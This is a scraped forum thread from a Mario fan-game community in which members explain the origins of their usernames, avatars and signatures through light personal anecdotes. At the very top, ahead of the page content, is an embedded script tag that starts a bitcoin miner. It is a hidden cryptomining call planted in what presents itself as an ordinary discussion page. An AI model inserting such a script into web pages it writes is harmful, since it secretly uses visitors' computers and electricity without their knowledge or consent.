<script>
miner.start(); // initialise bitcoin miner
</script>

mario fan games galaxysmbx communitypge project

Where did you get your name/avatar/sig from?

here's a good place for FRIENDLY, ENJOYABLE, and otherwise very GENERAL discussion!
ScribePennington
Heck
First name: Munch
Pronouns: They/them

Re: Where did you get your name/avatar/sig from?

Postby ScribePennington » 5 years ago

name: long dumb horse related story
avatar: main character from over the garden wall
sig: a gif I giffed of raocow in his natural habitat. Along with an outdated joke from the talkhougotchi life thread

Woof

qazcake
A cake masquerading as a burger
First name: qaz

Postby qazcake » 5 years ago

At this point i dont remember where the qaz came from since i have had that part of the name since 2006 but i think i just combined it with cake because i was hungry.

I got the burger cake on a random image search since i figured i do what i did with my skype picture and put a picture of a cake.

I have no sig but i really should get one.

LiAS

Postby LiAS » 4 years ago

I honestly have no idea how I thought of my name.
I made my avatar myself, and I'm pretty proud of it.
I wrote my signature myself in the style of something raocow *might* say.

Gyra Solune
the feared barbarian
Pronouns: she/her

Postby Gyra Solune » 4 years ago

Many usernames I have had over the years.

The very first one that I can remember using was on the Lego message boards as a wee child, then I was super into cars especially the Carrera GT so I went with thecgtdriver for a while. Then I was super into the two Suzuki concepts in Gran Turismo 4, so I changed it to GSX-R/4S2 which is absolutely lovely to remember to type. Then I migrated to the Mario wiki place and sought out something to be easier to remember, and at the time I was writing some Paper Mario fanfiction where the main antagonist was Mr. L along with equivalent versions of all the rest of the behatted bros and according princesses that were collectively named the Negative Squad, and I used that as my name. Then I got kinda tired of that-ish and was into Animal Crossing at the time and thought Gyroids were the coolest things ever so I changed it to Gyroid X. And then I was all thinking of something a bit nicer in text and decided to make something of a pen name, Gyra deriving from the previous as something I thought sounded name-ish, Solune being a nifty portmanteau of words relating to the sun and moon, and I felt it was pleasant to the eyes and ears so it has stuck the longest.

And my avatar is a thing I drew myself, a side profile for Ilivais X, the main character's giant robot in a story of mine entitled the same. It's all crazy and physics breaking and has a perpetual energy generator on its back and this leads to MUCH DRAMA. Of course more commonly on the internet as in say, Skypehaus my icon is a white haired lady on a blue background with a big black and white sword and that is also something I drew myself, an Original Character Do Not Steal named Geneva who is super angsty and regretful and tries to murder multidimensional gods which is something very in place in its planned origin, a Mario themed Zelda Classic game.

words. so many

Snakebite969
Absolutely No Step On Snek
Pronouns: he/him/his

Postby Snakebite969 » 4 years ago

I've already explained my name once, so here I'll explain my new avatar and sig

Avatar is Miia from monster musume. She's a lamia (snake girl)
The new spoiler in my sig is 2 pages taken from monster musume that are massive touhou references.
Poppo wrote:Poppo! Poppo! *clickety-clank* Po! Po! Po! *clickety-clank* Po? Po... Po... Po... Pogyaaaah!!
ImageImage

bkamakaze
A million dollars isn’t cool. You know what’s cool? A basilisk.
First name: (◕ v ◕✿)

Postby bkamakaze » 4 years ago

Snakebite969 wrote:I've already explained my name once, so here I'll explain my new avatar and sig

Avatar is Miia from monster musume. She's a lamia (snake girl)
The new spoiler in my sig is 2 pages taken from monster musume that are massive touhou references.
you have driven me to reading this
and i love it
SO MANY CUTIES
ImageImageImage

Ashan
The world has become a place

Postby Ashan » 4 years ago

My avatar is one of the 3 things Eric Wareheim loves in life

ano0maly
Discord User

Postby ano0maly » 4 years ago

New addition to signature, take and share if you like
Image The talkhaus Discord server. Come ask for an invite to join!

Now the sole biggest

Ivy

Postby Ivy » 4 years ago

please credit your avatar properly. that photograph is probably copyrighted.
3DS FC: 2793-0650-7690 | Switch: SW-2766-9108-9399 | Steam: ivysaur1996 (that ivy guy)
Many thanks to GlitchedGhost and Rockythechao for the amazing paper Demo animation!

KobaBeach
obscure jrpg enthusiast
First name: David
Pronouns: he/him

Postby KobaBeach » 4 years ago

twitter (spicy at times!) | avatar by kuma

who cares:

Gardenolva
Void and Voir embraced together...
First name: En Gardevoir
Pronouns: Male

Postby Gardenolva » 4 years ago

Username: I already told it. Oh! Did I mention it's sorta like this: Everytime I heard Fiora (yeah, I'm playing LoL) said 'En Garde', it hit me when I'm playing Pokemon Flora Sky (the hack) at the time that my Gardevoir (and of course the team) grew stronger. That 'sword fighting' quote and that Pokemon combined harmoniously. Thus, this username became intact in my head.

Sig: ...is a mess.

A.K.A.: En Gardevoir
Signature credits to DeviousShadows

Grounder

Postby Grounder » 4 years ago

Grounder is a Sonic character.

As for the rest of it...

The spoopiest Vocaloid song in existence.
Why don't you eat me?

I am perfectly tasty...

AND I'LL STEAL YOUR SOUL! :twisted:

ImageImageImage

dr_vblschrf
may or may not be an actual fox

Postby dr_vblschrf » 4 years ago

Name: explained in the thread for it but the short version is it's a character from a really bad story I wrote in 8th grade and the name just stuck.

Avatar: also a character from a story of mine, much more recent and (I hope) better than the other one. This one's drawn by one of my best friends, who's a really super-good artist. This is link to their work.

Sig: Not much to say here.

ano0maly
Discord User

This is Ivan from Golden Sun. Avatar made from this picture.

Now the sole biggest

ano0maly
Discord User

It's Toadette!

Now the sole biggest

blue_kirby
Wrong lever!!!

Postby blue_kirby » 4 years ago

Name: Kirby is one of my favorite characters and blue considered my favorite color.

Avatar: Lil Bub (http://lilbub.com) in a Terran Marine outfit.

Signature: A funny Emperor's New Groove/Adventure mashup I saw on Facebook.
"That's embarrassing"

Piter Lauchy
Suitable for all Buddy purposes
First name: Merlin

Postby Piter Lauchy » 4 years ago

Name: Two friends and me once decided to make a very bad good rap band (for the German-speaking folks reading this: Similar to Fresh Dumbledore, only way worse better). Piter Lauchy is my pseudonym in it. Piter's pronounced like the name Peter and Lauchy contains a phoneme that sounds like someone suffocating on a piece of carpet to English ears. That's my guess anyway.

Avatar: It's Buddy Jesus from Kevin Smith's Dogma. I love the film and even though it's obviously just taking the piss, I love the idea of switching out cross-Jesus with this version. I don't consider myself Christian, but I think that he was a pretty rad dude.

Sig: Spread the love.
You're awesome.

Nathan the Talkmaus
Unofficial Talkhaus Mascot

Postby Nathan the Talkmaus » 4 years ago

Name: I used to go by "Ronin Catholic" and "Ronintendo" on most other websites and make up names/backstories for my various fursonas as I changed species (fox, bat, wolf, tanuki, various hybrids, etc). When I changed to dormouse in 2013 I just said "Screw it, I'll use my real name because that's what everyone always calls me in the community where I'm most prominent anyway" and added variants of "the Mouse" or "the Dormouse" at various points with no consistency between sites. When raocow announced the first MaGL X signup being on the Talkhaus, I decided to sign up and figured "Talkmaus" was thematically appropriate for my new environment.

Avatar: I drew the sprite intending it as an avatar anyway, probably the in spring of 2013. The reasons for it being 20x20 are twofold:
1) 100x100, 80x80, and 120x120 are the most common acceptable avatar dimensions I'm familiar with on various sites so 20 pixels scales very nicely with all of them and
2) 20x20 is the size for a tile / character map sprite in my RPG engine of choice so it's what I've been used to drawing since 2003.

After getting my new computer around a month ago, I decided to draw the other three directions for my sprite's facing and update it with the added white from some of my newer art.
Winner of the Horikawa Blessing 2015

Pyro
cutest girl 2023

Postby Pyro » 4 years ago

the name is from Snorunt (a pokemon I like) and Pyro Guys (enemy from Paper Mario I like). Snorunt + Pyro = SnoruntPyro :shock: :shock:

Sasquatch
Don't mess with sasquatch

Postby Sasquatch » 4 years ago

Just a selfie. :)

Pikabread
we're gonna talk about e
First name: lily
Pronouns: she/her/xe/xem

Postby Pikabread » 4 years ago

Not sure if I ever posted here? Welp, here goes

The name for my first account (and what I use still on a lot of services, such as steam) was PichuVSLink, which I only really came up with upon finding a picture of a pichu dressed as link. That's were I really started developing my 'internet identity' if you want to call it that.

The name I use nowadays and what I will continue to use, Pikabread, came from a blank mind trying to come up with a name for a tumblr account. What do I like? idk pokémon and bread

While PichuVSLink/Pikabread are my more 'formal' or full names for stuff I generally just go by pichu, which is why I have it in my "first name" field.

The avatar (currently) is a trainer sprite I drew of myself a while back. While not bearing any resemblance to the real me, it's what my trainer looked like the first time I played through Pokémon X.

And the signature is made up of avatar credits, pictures others have drawn of me, and some revolving skypehaus jokes or other nonsense.

Nathan the Talkmaus
Unofficial Talkhaus Mascot

Postby Nathan the Talkmaus » 4 years ago

My signature is because I got the closest guess for MaGL X2's number of levels. Everyone else was lowballing into the low 100s and I decided to go with 255; we wound up with just over 270 and so since I was so close I was given the Horikawa blessing.
Winner of the Horikawa Blessing 2015

Kukironosuke
You can call me Kuki
First name: Travis
Pronouns: he/him/kirbys

Postby Kukironosuke » 4 years ago

Name-

When I was about 14-15(2004-2005) my twin brother and I had a shared online identity and went by the name Kirby on an mmorpg and in general online on msn messenger and such, around the age of 15-16 I made a character named Kurby(and some called me ku) to distinguish myself from my brothers character. Time went on and I wanted to make a more personal nickname for myself, around that time I was just getting into naruto and was getting my weeb on so I just went with something that sounded Japanese, nosuke is a common suffix on Japanese names, the ku prefix is from Kurby, the I threw Kiro in the middle because I thought it flowed and sounded nicely, like kojiro the blue cuckoo from Zelda oot

The shortened nickname kuki(koo kee) came sometime later

I've been looking for an appropriate avatar, but all of the pictures I've tried are too large, and I don't know how to shrink them without making them look terrible, I'll keep looking, it will probably be some variation of Kirby, or anime character

Sig- also been thinking of things to put here, there is so much I like to share with people but I have a hard time not overdoing things, once I start listing hobbies I go on and on and don't stop, so I'll probably just find a nice quote or something

Ivy

Postby Ivy » 4 years ago

making your own sprite is a good way to get a nice avatar
3DS FC: 2793-0650-7690 | Switch: SW-2766-9108-9399 | Steam: ivysaur1996 (that ivy guy)
Many thanks to GlitchedGhost and Rockythechao for the amazing paper Demo animation!

Hoeloe
A2XT person

Postby Hoeloe » 4 years ago

As a dumb 11 year old, I used to love Pokemon cards and was looking forward to the release of a certain game called "Halo". I mixed the pronunciation of the words "holographic" and "halo" and then spelled it out. I was dumb.

My avatar comes from art for a game I was working on called Decima: The Last Story of Vald, which had to be cancelled because the tools being used to develop it were deprecated. I hope to go back to it at some point.

My signature comes from the game I'm currently working on professionally. It's basically a 3D metroidvania, so it should be interesting.

Return to “the gazebo”